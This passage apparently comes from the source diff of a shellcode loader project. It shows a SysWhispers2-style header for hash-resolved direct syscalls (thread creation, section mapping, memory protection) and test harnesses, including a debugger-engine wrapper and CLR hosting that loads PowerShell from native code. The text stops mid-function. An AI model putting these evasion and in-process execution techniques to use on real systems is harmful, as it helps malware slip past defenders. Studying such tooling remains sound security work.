37 #define SW2_HEADER_H_
38
39 #include <windows.h>
40 #include "peb.h"
41
42 #define SW2_SEED 0x26C20505
43 #define SW2_ROL8(v) (v << 8 | v >> 24)
44 #define SW2_ROR8(v) (v >> 8 | v << 24)
45 #define SW2_ROX8(v) ((SW2_SEED % 2) ? SW2_ROL8(v) : SW2_ROR8(v))
46 #define SW2_MAX_ENTRIES 500
47 #define SW2_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)
48
49 #ifdef _WIN64
50 #define PEB_OFFSET 0x60
51 #define READ_MEMLOC __readgsqword
52 #else
53 #define PEB_OFFSET 0x30
54 #define READ_MEMLOC __readfsdword
55 #endif
56
57 // Typedefs are prefixed to avoid pollution.
58
59 typedef struct _SW2_SYSCALL_ENTRY
60 {
61 DWORD Hash;
62 DWORD Address;
63 } SW2_SYSCALL_ENTRY, *PSW2_SYSCALL_ENTRY;
64
65 typedef struct _SW2_SYSCALL_LIST
66 {
67 DWORD Count;
68 SW2_SYSCALL_ENTRY Entries[SW2_MAX_ENTRIES];
69 } SYSCALL_LIST, *PSYSCALL_LIST;
70
71 typedef struct _SW2_PEB_LDR_DATA {
72 BYTE Reserved1[8];
73 PVOID Reserved2[3];
74 LIST_ENTRY InMemoryOrderModuleList;
75 } SW2_PEB_LDR_DATA, *PSW2_PEB_LDR_DATA;
76
77 typedef struct _SW2_LDR_DATA_TABLE_ENTRY {
78 PVOID Reserved1[2];
79 LIST_ENTRY InMemoryOrderLinks;
80 PVOID Reserved2[2];
81 PVOID DllBase;
82 } SW2_LDR_DATA_TABLE_ENTRY, *PSW2_LDR_DATA_TABLE_ENTRY;
83
84 typedef struct _SW2_PEB {
85 BYTE Reserved1[2];
86 BYTE BeingDebugged;
87 BYTE Reserved2[1];
88 PVOID Reserved3[2];
89 PSW2_PEB_LDR_DATA Ldr;
90 } SW2_PEB, *PSW2_PEB;
91
92 DWORD SW2_HashSyscall(PCSTR FunctionName);
93 BOOL SW2_PopulateSyscallList(PSYSCALL_LIST SW2_SyscallList);
94 #if defined(__GNUC__)
95 EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash, PSYSCALL_LIST SW2_SyscallList) asm ("SW2_GetSyscallNumber");
96 #if defined(_M_IX86)
97 VOID DoSysenter(VOID) asm ("DoSysenter");
98 #endif
99 #else
100 EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash, PSYSCALL_LIST SW2_SyscallList);
101 #if defined(_M_IX86)
102 VOID DoSysenter(VOID);
103 #endif
104 #endif
105
106 #define OBJ_CASE_INSENSITIVE 0x00000040L
107
108 #ifndef InitializeObjectAttributes
109 #define InitializeObjectAttributes( p, n, a, r, s ) { \
110 (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
111 (p)->RootDirectory = r; \
112 (p)->Attributes = a; \
113 (p)->ObjectName = n; \
114 (p)->SecurityDescriptor = s; \
115 (p)->SecurityQualityOfService = NULL; \
116 }
117 #endif
118
119 typedef struct _OBJECT_ATTRIBUTES
120 {
121 ULONG Length;
122 HANDLE RootDirectory;
123 PUNICODE_STRING ObjectName;
124 ULONG Attributes;
125 PVOID SecurityDescriptor;
126 PVOID SecurityQualityOfService;
127 } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
128
129 typedef struct _IO_STATUS_BLOCK
130 {
131 union
132 {
133 NTSTATUS Status;
134 VOID* Pointer;
135 };
136 ULONG_PTR Information;
137 } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
138
139 typedef struct _USER_STACK
140 {
141 PVOID FixedStackBase;
142 PVOID FixedStackLimit;
143 PVOID ExpandableStackBase;
144 PVOID ExpandableStackLimit;
145 PVOID ExpandableStackBottom;
146 } USER_STACK, *PUSER_STACK;
147
148 typedef enum _MEMORY_INFORMATION_CLASS
149 {
150 MemoryBasicInformation,
151 MemoryWorkingSetInformation,
152 MemoryMappedFilenameInformation,
153 MemoryRegionInformation,
154 MemoryWorkingSetExInformation,
155 MemorySharedCommitInformation,
156 MemoryImageInformation,
157 MemoryRegionInformationEx,
158 MemoryPrivilegedBasicInformation,
159 MemoryEnclaveImageInformation,
160 MemoryBasicInformationCapped
161 } MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;
162
163 typedef struct _PS_ATTRIBUTE
164 {
165 ULONG Attribute;
166 SIZE_T Size;
167 union
168 {
169 ULONG Value;
170 PVOID ValuePtr;
171 } u1;
172 PSIZE_T ReturnLength;
173 } PS_ATTRIBUTE, *PPS_ATTRIBUTE;
174
175 typedef struct _PS_ATTRIBUTE_LIST
176 {
177 SIZE_T TotalLength;
178 PS_ATTRIBUTE Attributes[1];
179 } PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
180
181 EXTERN_C NTSTATUS NtCreateSection(
182 OUT PHANDLE SectionHandle,
183 IN ACCESS_MASK DesiredAccess,
184 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
185 IN PLARGE_INTEGER MaximumSize OPTIONAL,
186 IN ULONG SectionPageProtection,
187 IN ULONG AllocationAttributes,
188 IN HANDLE FileHandle OPTIONAL,
189 IN PSYSCALL_LIST SyscallList);
190
191 EXTERN_C NTSTATUS NtMapViewOfSection(
192 IN HANDLE SectionHandle,
193 IN HANDLE ProcessHandle,
194 IN OUT PVOID BaseAddress,
195 IN ULONG ZeroBits,
196 IN SIZE_T CommitSize,
197 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
198 IN OUT PSIZE_T ViewSize,
199 IN ULONG InheritDisposition,
200 IN ULONG AllocationType,
201 IN ULONG Win32Protect,
202 IN PSYSCALL_LIST SyscallList);
203
204 EXTERN_C NTSTATUS NtUnmapViewOfSection(
205 IN HANDLE ProcessHandle,
206 IN PVOID BaseAddress,
207 IN PSYSCALL_LIST SyscallList);
208
209 EXTERN_C NTSTATUS NtContinue(
210 IN PCONTEXT ContextRecord,
211 IN BOOLEAN TestAlert,
212 IN PSYSCALL_LIST SyscallList);
213
214 EXTERN_C NTSTATUS NtClose(
215 IN HANDLE Handle,
216 IN PSYSCALL_LIST SyscallList);
217
218 EXTERN_C NTSTATUS NtWaitForSingleObject(
219 IN HANDLE ObjectHandle,
220 IN BOOLEAN Alertable,
221 IN PLARGE_INTEGER TimeOut OPTIONAL,
222 IN PSYSCALL_LIST SyscallList);
223
224 EXTERN_C NTSTATUS NtProtectVirtualMemory(
225 IN HANDLE ProcessHandle,
226 IN OUT PVOID * BaseAddress,
227 IN OUT PSIZE_T RegionSize,
228 IN ULONG NewProtect,
229 OUT PULONG OldProtect,
230 IN PSYSCALL_LIST SyscallList);
231
232 EXTERN_C NTSTATUS NtAllocateVirtualMemory(
233 IN HANDLE ProcessHandle,
234 IN OUT PVOID * BaseAddress,
235 IN ULONG ZeroBits,
236 IN OUT PSIZE_T RegionSize,
237 IN ULONG AllocationType,
238 IN ULONG Protect,
239 IN PSYSCALL_LIST SyscallList);
240
241 EXTERN_C NTSTATUS NtCreateFile(
242 OUT PHANDLE FileHandle,
243 IN ACCESS_MASK DesiredAccess,
244 IN POBJECT_ATTRIBUTES ObjectAttributes,
245 OUT PIO_STATUS_BLOCK IoStatusBlock,
246 IN PLARGE_INTEGER AllocationSize OPTIONAL,
247 IN ULONG FileAttributes,
248 IN ULONG ShareAccess,
249 IN ULONG CreateDisposition,
250 IN ULONG CreateOptions,
251 IN PVOID EaBuffer OPTIONAL,
252 IN ULONG EaLength,
253 IN PSYSCALL_LIST SyscallList);
254
255 EXTERN_C NTSTATUS NtGetContextThread(
256 IN HANDLE ThreadHandle,
257 IN OUT PCONTEXT ThreadContext,
258 IN PSYSCALL_LIST SyscallList);
259
260 EXTERN_C NTSTATUS NtFreeVirtualMemory(
261 IN HANDLE ProcessHandle,
262 IN OUT PVOID * BaseAddress,
263 IN OUT PSIZE_T RegionSize,
264 IN ULONG FreeType,
265 IN PSYSCALL_LIST SyscallList);
266
267 EXTERN_C NTSTATUS NtQueryVirtualMemory(
268 IN HANDLE ProcessHandle,
269 IN PVOID BaseAddress,
270 IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
271 OUT PVOID MemoryInformation,
272 IN SIZE_T MemoryInformationLength,
273 OUT PSIZE_T ReturnLength OPTIONAL,
274 IN PSYSCALL_LIST SyscallList);
275
276 EXTERN_C NTSTATUS NtCreateThreadEx(
277 OUT PHANDLE ThreadHandle,
278 IN ACCESS_MASK DesiredAccess,
279 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
280 IN HANDLE ProcessHandle,
281 IN PVOID StartRoutine,
282 IN PVOID Argument OPTIONAL,
283 IN ULONG CreateFlags,
284 IN SIZE_T ZeroBits,
285 IN SIZE_T StackSize,
286 IN SIZE_T MaximumStackSize,
287 IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL,
288 IN PSYSCALL_LIST SyscallList);
289
290 EXTERN_C NTSTATUS NtFlushInstructionCache(
291 IN HANDLE ProcessHandle,
292 IN PVOID BaseAddress OPTIONAL,
293 IN ULONG Length,
294 IN PSYSCALL_LIST SyscallList);
295
296 #endif
+37
-0
loader/test/api_test.c less more
0
1 #define UNICODE
2 #include <windows.h>
3
4 #include "donut.h"
5 #pragma comment(lib, "user32.lib")
6
7 void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
8 typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
9
10 int main(void) {
11 HMODULE m;
12 _DonutApiW DonutApiW;
13 WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
14
15 WCHAR msg[4096];
16
17 _snwprintf(msg, ARRAYSIZE(msg),
18 L"param[0] : %ws\r"
19 L"param[1] : %ws\r"
20 L"param[2] : %ws\r"
21 L"param[3] : %ws\r",
22 param[0], param[1], param[2], param[3]);
23
24 MessageBox(NULL, msg, L"Donut Test", MB_OK);
25
26 m = LoadLibrary(L"call_api_dll.dll");
27
28 if(m != NULL) {
29 DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
30 if(DonutApiW != NULL) {
31 call_api((FARPROC)DonutApiW, 4, param);
32 }
33 }
34 return 0;
35 }
36
+184
-0
loader/test/debug.cpp less more
0
1 // example of using the windows debugger engine from console
2 // derived from code by the blabberer
3
4 #include "debug.h"
5
6 // ##################### Debug class ########################
7 Debug::Debug() {
8 Client = NULL;
9 Control = NULL;
10 Breakpoint = NULL;
11
12 // create instance of IDebugClient
13 Status = DebugCreate(__uuidof(IDebugClient), (void**)&Client);
14 if(Status == S_OK) {
15 // obtain IDebugControl interface
16 Status = Client->QueryInterface(__uuidof(IDebugControl), (void**)&Control);
17 if(Status == S_OK) {
18 // setup callbacks for console I/O
19 Client->SetOutputCallbacks(&OutputCb);
20 Client->SetInputCallbacks(&InputCb);
21 InputCb.Control = Control;
22
23 Client->SetEventCallbacks(&EventCb);
24 EventCb.Control = Control;
25 }
26 }
27 }
28
29 // create new process or attach to existing one
30 // CommandLine should be set to NULL if attaching
31 Debug::Debug(PSTR CommandLine, ULONG ProcessId) {
32 Debug();
33 Start(CommandLine, ProcessId);
34 }
35
36 Debug::~Debug() {
37 if (Control != NULL) {
38 Control->Release();
39 Control = NULL;
40 }
41 if (Client != NULL) {
42 Client->EndSession(DEBUG_END_PASSIVE);
43 Client->Release();
44 Client = NULL;
45 }
46 }
47
48 BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId) {
49 ULONG AttachFlags = DEBUG_ATTACH_NONINVASIVE | DEBUG_ATTACH_NONINVASIVE_NO_SUSPEND;
50 ULONG CreateFlags = DEBUG_ONLY_THIS_PROCESS;
51
52 Status = Client->CreateProcessAndAttach(0, CommandLine, CreateFlags, ProcessId, AttachFlags);
53 return Status == S_OK;
54 }
55
56 // ##################### IDebugOutputCallbacks ########################
57 // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/dbgeng/nn-dbgeng-idebugoutputcallbacks
58 STDMETHODIMP StdioOutputCallbacks::QueryInterface(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface) {
59 *Interface = NULL;
60
61 if (IsEqualIID(InterfaceId, __uuidof(IUnknown)) ||
62 IsEqualIID(InterfaceId, __uuidof(IDebugOutputCallbacks))) {
63 *Interface = (IDebugOutputCallbacks *)this;
64 AddRef();
65 return S_OK;
66 } else {
67 return E_NOINTERFACE;
68 }
69 }
70
71 // ##################### IDebugInputCallbacks ########################
72 // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/dbgeng/nn-dbgeng-idebuginputcallbacks
73 STDMETHODIMP StdioInputCallbacks::QueryInterface( THIS_ IN REFIID InterfaceId, OUT PVOID* Interface) {
74 *Interface = NULL;
75
76 if (IsEqualIID(InterfaceId, __uuidof(IUnknown)) ||
77 IsEqualIID(InterfaceId, __uuidof(IDebugInputCallbacks))) {
78 *Interface = (IDebugInputCallbacks *)this;
79 AddRef();
80 return S_OK;
81 } else {
82 return E_NOINTERFACE;
83 }
84 }
85
86 STDMETHODIMP StdioInputCallbacks::StartInput(THIS_ IN ULONG BufferSize) {
87 char *Buffer;
88
89 Buffer = (char *)calloc(1, BufferSize+8);
90 fgets(Buffer, BufferSize, stdin);
91 Control->ReturnInput(Buffer);
92 free(Buffer);
93
94 return S_OK;
95 }
96
97 // ##################### DebugBaseEventCallbacks ########################
98 STDMETHODIMP EventCallbacks::Breakpoint( THIS_ IN PDEBUG_BREAKPOINT Bp ) {
99 return DEBUG_STATUS_BREAK;
100 }
101
102 STDMETHODIMP EventCallbacks::CreateProcess(THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 Handle,
103 IN ULONG64 BaseOffset,IN ULONG ModuleSize,IN PCSTR ModuleName,IN PCSTR ImageName,
104 IN ULONG CheckSum, IN ULONG TimeDateStamp,IN ULONG64 InitialThreadHandle,
105 IN ULONG64 ThreadDataOffset, IN ULONG64 StartOffset
106 )
107 {
108 HRESULT Status;
109 IDebugBreakpoint* Breakpoint;
110
111 Status = Control->AddBreakpoint(DEBUG_BREAKPOINT_CODE, DEBUG_ANY_ID, &Breakpoint);
112 if(Status == S_OK) {
113 Status = Breakpoint->SetOffset(StartOffset);
114 if(Status == S_OK) {
115 Status = Breakpoint->SetFlags(DEBUG_BREAKPOINT_ENABLED);
116 }
117 }
118 return DEBUG_STATUS_NO_CHANGE;
119 }
120
121 STDMETHODIMP EventCallbacks::CreateThread(THIS_ IN ULONG64 Handle, IN ULONG64 DataOffset, IN ULONG64 StartOffset) {
122 return DEBUG_STATUS_NO_CHANGE;
123 }
124
125 STDMETHODIMP EventCallbacks::Exception( THIS_ IN PEXCEPTION_RECORD64 Exception, IN ULONG FirstChance ) {
126 return DEBUG_STATUS_BREAK;
127 }
128
129 STDMETHODIMP EventCallbacks::ExitProcess (THIS_ IN ULONG ExitCode ) {
130 return DEBUG_STATUS_NO_CHANGE;
131 }
132
133 STDMETHODIMP EventCallbacks::ExitThread (THIS_ IN ULONG ExitCode ) {
134 return DEBUG_STATUS_NO_CHANGE;
135 }
136
137 STDMETHODIMP EventCallbacks::GetInterestMask( THIS_ OUT PULONG Mask ) {
138 *Mask =
139 DEBUG_EVENT_BREAKPOINT |
140 DEBUG_EVENT_EXCEPTION |
141 DEBUG_EVENT_CREATE_THREAD |
142 DEBUG_EVENT_EXIT_THREAD |
143 DEBUG_EVENT_CREATE_PROCESS |
144 DEBUG_EVENT_EXIT_PROCESS |
145 DEBUG_EVENT_LOAD_MODULE |
146 DEBUG_EVENT_UNLOAD_MODULE |
147 DEBUG_EVENT_SYSTEM_ERROR |
148 DEBUG_EVENT_SESSION_STATUS |
149 DEBUG_EVENT_CHANGE_DEBUGGEE_STATE |
150 DEBUG_EVENT_CHANGE_ENGINE_STATE |
151 DEBUG_EVENT_CHANGE_SYMBOL_STATE;
152 return S_OK;
153 }
154
155 STDMETHODIMP EventCallbacks::LoadModule( THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 BaseOffset,
156 IN ULONG ModuleSize,IN PCSTR ModuleName, IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp ) {
157 return DEBUG_STATUS_NO_CHANGE;
158 }
159
160 STDMETHODIMP EventCallbacks::SystemError( THIS_ IN ULONG Error, IN ULONG Level ) {
161 return DEBUG_STATUS_BREAK;
162 }
163
164 STDMETHODIMP EventCallbacks::UnloadModule( THIS_ IN PCSTR ImageBaseName, IN ULONG64 BaseOffset ) {
165 return DEBUG_STATUS_NO_CHANGE;
166 }
167
168 STDMETHODIMP EventCallbacks::SessionStatus( THIS_ IN ULONG SessionStatus ) {
169 return DEBUG_STATUS_NO_CHANGE;
170 }
171
172 STDMETHODIMP EventCallbacks::ChangeDebuggeeState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
173 //State = 1;
174 return DEBUG_STATUS_NO_CHANGE;
175 }
176
177 STDMETHODIMP EventCallbacks::ChangeEngineState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
178 return DEBUG_STATUS_NO_CHANGE;
179 }
180
181 STDMETHODIMP EventCallbacks::ChangeSymbolState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
182 return DEBUG_STATUS_NO_CHANGE;
183 }
+71
-0
loader/test/debug.h less more
0
1 #ifndef DEBUG_H
2 #define DEBUG_H
3
4 #include <windows.h>
5 #include <dbgeng.h>
6 #include <stdio.h>
7
8 #pragma comment(lib, "dbgeng.lib")
9
10 class EventCallbacks : public DebugBaseEventCallbacks {
11 public:
12 STDMETHOD_(ULONG, AddRef) (THIS ) { return 1;};
13 STDMETHOD_(ULONG, Release) (THIS ) { return 0;};
14 STDMETHOD(Breakpoint) (THIS_ IN PDEBUG_BREAKPOINT Bp );
15 STDMETHOD(ChangeDebuggeeState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
16 STDMETHOD(ChangeEngineState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
17 STDMETHOD(ChangeSymbolState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
18 STDMETHOD(CreateThread) (THIS_ IN ULONG64 Handle, IN ULONG64 DataOffset,IN ULONG64 StartOffset);
19 STDMETHOD(Exception) (THIS_ IN PEXCEPTION_RECORD64 Exception, IN ULONG FirstChance );
20 STDMETHOD(ExitProcess) (THIS_ IN ULONG ExitCode );
21 STDMETHOD(ExitThread) (THIS_ IN ULONG ExitCode );
22 STDMETHOD(GetInterestMask) (THIS_ OUT PULONG Mask );
23 STDMETHOD(SessionStatus) (THIS_ IN ULONG Status );
24 STDMETHOD(SystemError) (THIS_ IN ULONG Error, IN ULONG Level );
25 STDMETHOD(UnloadModule) (THIS_ IN PCSTR ImageBaseName, IN ULONG64 BaseOffset );
26 STDMETHOD(LoadModule) (THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 BaseOffset, IN ULONG ModuleSize, IN PCSTR ModuleName,IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp );
27 STDMETHOD(CreateProcess) ( THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 Handle, IN ULONG64 BaseOffset, IN ULONG ModuleSize, IN PCSTR ModuleName, IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp, IN ULONG64 InitialThreadHandle, IN ULONG64 ThreadDataOffset, IN ULONG64 StartOffset );
28
29 IDebugClient* Client;
30 IDebugControl* Control;
31 };
32
33 class StdioOutputCallbacks : public IDebugOutputCallbacks {
34 public:
35 STDMETHOD(QueryInterface)(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface);
36 STDMETHOD_(ULONG, AddRef)(THIS){ return 1; };
37 STDMETHOD_(ULONG, Release)(THIS){ return 0; };
38 STDMETHOD(Output)(THIS_ IN ULONG Mask, IN PCSTR Text) { fputs(Text, stdout); return S_OK; };
39 };
40
41 class StdioInputCallbacks : public IDebugInputCallbacks {
42 public:
43 STDMETHOD(QueryInterface)(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface);
44 STDMETHOD_(ULONG, AddRef)(THIS){ return 1; };
45 STDMETHOD_(ULONG, Release)(THIS) { return 0; };
46 STDMETHOD(StartInput)(THIS_ IN ULONG BufferSize);
47 STDMETHOD(EndInput)(THIS_ void) { return S_OK; };
48
49 IDebugControl* Control;
50 };
51
52 class Debug {
53 public:
54 Debug();
55 Debug(PSTR CommandLine, ULONG ProcessId);
56 ~Debug();
57 BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId);
58
59 StdioOutputCallbacks OutputCb;
60 StdioInputCallbacks InputCb;
61 EventCallbacks EventCb;
62
63 IDebugClient* Client;
64 IDebugControl* Control;
65 IDebugBreakpoint* Breakpoint;
66 bool State;
67 HRESULT Status;
68 };
69
70 #endif
+440
-0
loader/test/rdt.cpp less more
0
1 // code to implement hooking ProcessExit from unmanaged code
2 // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
3 //
4 #include <windows.h>
5 #include <oleauto.h>
6 #include <mscoree.h>
7 #include <comdef.h>
8 #include <propvarutil.h>
9 #include <metahost.h>
10
11 #include <cstdio>
12 #include <cstdint>
13 #include <cstring>
14 #include <cstdlib>
15 #include <sys/stat.h>
16
17 #import "mscorlib.tlb" raw_interfaces_only
18 #import "shdocvw.dll"
19
20 #pragma comment(lib, "mscoree.lib")
21
22 void my_function(void *evt) {
23 printf("Received event\n");
24 }
25
26 void DumpMethods(mscorlib::_TypePtr type) {
27 mscorlib::_MethodInfoPtr mi;
28 mscorlib::_ParameterInfoPtr pi;
29 mscorlib::_TypePtr ptype;
30 SAFEARRAY *sa, *params;
31 HRESULT hr;
32 LONG i, j, cnt, pcnt, lcnt, ucnt;
33 BSTR name;
34 VARIANT vt;
35 VARTYPE var;
36
37 hr = type->GetMethods(
38 (mscorlib::BindingFlags)
39 (mscorlib::BindingFlags_Static |
40 mscorlib::BindingFlags_Public),
41 &sa);
42
43 if(hr == S_OK) {
44 SafeArrayGetLBound(sa, 1, &lcnt);
45 SafeArrayGetUBound(sa, 1, &ucnt);
46
47 cnt = (ucnt - lcnt + 1);
48
49 for(i=0; i<cnt; i++) {
50 hr = SafeArrayGetElement(sa, &i, (void*)&mi);
51 if(hr == S_OK) {
52 mi->get_name(&name);
53 printf("%ws(", name);
54 hr = mi->GetParameters(&params);
55 if(hr == S_OK) {
56 SafeArrayGetLBound(params, 1, &lcnt);
57 SafeArrayGetUBound(params, 1, &ucnt);
58
59 pcnt = (ucnt - lcnt + 1);
60 printf("%i", pcnt);
61 for(j=0; j<pcnt; j++) {
62 hr = SafeArrayGetElement(params, &j, (void*)&pi);
63
64 // VARTYPE should be VT_UNKNOWN
65 hr = SafeArrayGetVartype(params, &var);
66 BSTR meth = SysAllocString(L"ParameterType");
67 DISPID id;
68 // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
69 //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
70 printf("HRESULT : %lx\n", hr);
71 }
72 }
73 printf(")\n");
74 }
75 }
76 }
77 }
78
79 void rundotnet(void *code, size_t len) {
80 HRESULT hr;
81 ICLRMetaHost *icmh;
82 ICLRRuntimeInfo *icri;
83 ICorRuntimeHost *icrh;
84 IUnknownPtr iu;
85 mscorlib::_AppDomainPtr ad;
86 mscorlib::_AssemblyPtr as, as1, as2, as3;
87 mscorlib::_MethodInfoPtr mi;
88 mscorlib::_EventInfoPtr nfo;
89 mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
90 mscorlib::_DelegatePtr delegate;
91 mscorlib::_ParameterInfoPtr param;
92 mscorlib::_EventHandlerPtr handler;
93 VARIANT v1, v2, v_ptr, v_type, ret;
94 SAFEARRAY *sa, *sa2, *sav;
95 SAFEARRAYBOUND sab;
96 BOOL loadable;
97 LONG idx;
98
99 printf("CoCreateInstance(ICorRuntimeHost).\n");
100
101 hr = CLRCreateInstance(
102 CLSID_CLRMetaHost,
103 IID_ICLRMetaHost,
104 (LPVOID*)&icmh);
105
106 if(SUCCEEDED(hr)) {
107 printf("ICLRMetaHost::GetRuntime\n");
108
109 hr = icmh->GetRuntime(
110 L"v4.0.30319",
111 IID_ICLRRuntimeInfo, (LPVOID*)&icri);
112
113 if(SUCCEEDED(hr)) {
114 printf("ICLRRuntimeInfo::IsLoadable\n");
115 hr = icri->IsLoadable(&loadable);
116
117 if(SUCCEEDED(hr) && loadable) {
118 printf("ICLRRuntimeInfo::GetInterface\n");
119
120 hr = icri->GetInterface(
121 CLSID_CorRuntimeHost,
122 IID_ICorRuntimeHost,
123 (LPVOID*)&icrh);
124 } else return;
125 } else return;
126 } else return;
127
128 printf("ICorRuntimeHost::Start()\n");
129 hr = icrh->Start();
130 if(SUCCEEDED(hr)) {
131 printf("ICorRuntimeHost::GetDefaultDomain()\n");
132 hr = icrh->GetDefaultDomain(&iu);
133 if(SUCCEEDED(hr)) {
134 printf("IUnknown::QueryInterface()\n");
135 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
136 if(SUCCEEDED(hr)) {
137 BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
138 // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
139 BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
140
141 BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
142
143 hr = ad->Load_2(str1, &as1); // load automation
144 hr = ad->Load_2(strX, &as3); // load interop services
145 printf("Loading System.Management.Automation : %lx\n", hr);
146 hr = ad->Load_2(str2, &as2); // load mscorlib
147
148 BSTR alloc = SysAllocString(L"Create");
149 BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
150 hr = as1->GetType_2(marshal, &mars);
151
152 printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
153
154 DumpMethods(mars);
155
156 // to retrieve a method, the SAFEARRAY is of IUnknown types
157 // this method doesn't accept anything, so just allocate array for it
158 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
159
160 hr = mars->GetMethod(alloc,
161 (mscorlib::BindingFlags)
162 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
163 NULL, // Binder
164 sav, // SAFEARRAY(_Type*)
165 NULL, // Modifiers
166 &mi); // MethodInfo
167
168 printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
169
170 v1.vt = VT_EMPTY;
171 VariantClear(&ret);
172
173 hr = mi->Invoke_3(
174 v1,
175 NULL, // arguments to method
176 &ret); // return value from method
177
178 printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
179
180 // at this point, we have the powershell object. we just need to call AddScript
181 // method, but this is an IDisposable
182
183 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
184 BSTR object = SysAllocString(L"System.Object");
185
186 as2->GetType_2(object, &ptr);
187 idx = 0;
188 SafeArrayPutElement(sav, &idx, ptr);
189
190 BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
191 BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
192 hr = as3->GetType_2(mars_str, &mars);
193
194 printf("Marshal : %p\n", (PVOID)mars);
195
196 hr = mars->GetMethod(get_obj,
197 (mscorlib::BindingFlags)
198 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
199 NULL, // Binder
200 sav, // SAFEARRAY(_Type*)
201 NULL, // Modifiers
202 &mi); // MethodInfo
203
204 printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
205
206 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
207 idx = 0;
208 SafeArrayPutElement(sav, &idx, &ret.punkVal);
209
210 v1.vt = VT_EMPTY;
211 VARIANT unk;
212 VariantClear(&unk);
213
214 hr = mi->Invoke_3(
215 v1,
216 sav, // arguments to method
217 &unk); // return value from method
218
219 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
220 getchar();
221 return;
222
223 // SAFEARRAY(_Type*)
224 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
225
226 // add System.IntPtr
227 BSTR str4 = SysAllocString(L"System.IntPtr");
228 as2->GetType_2(str4, &ptr);
229 //DumpMethods(ptr);
230 idx = 0;
231 hr = SafeArrayPutElement(sav, &idx, ptr);
232
233 // add System.Type
234 BSTR str5 = SysAllocString(L"System.Type");
235 as2->GetType_2(str5, &type);
236 idx = 1;
237 SafeArrayPutElement(sav, &idx, type);
238
239 BSTR str6 = SysAllocString(L"GetIUnknownForObject");
240 BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
241 hr = as1->GetType_2(str3, &mars);
242
243 hr = mars->GetMethod(str6,
244 (mscorlib::BindingFlags)
245 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
246 NULL, // Binder
247 sav, // SAFEARRAY(_Type*)
248 NULL, // Modifiers
249 &mi); // MethodInfo
250
251 printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
252
253 BSTR str9 = SysAllocString(L"ProcessExit");
254 BSTR strA = SysAllocString(L"System.AppDomain");
255
256 hr = as2->GetType_2(strA, &evt);
257 printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
258
259 hr = evt->GetEvent(str9,
260 (mscorlib::BindingFlags)
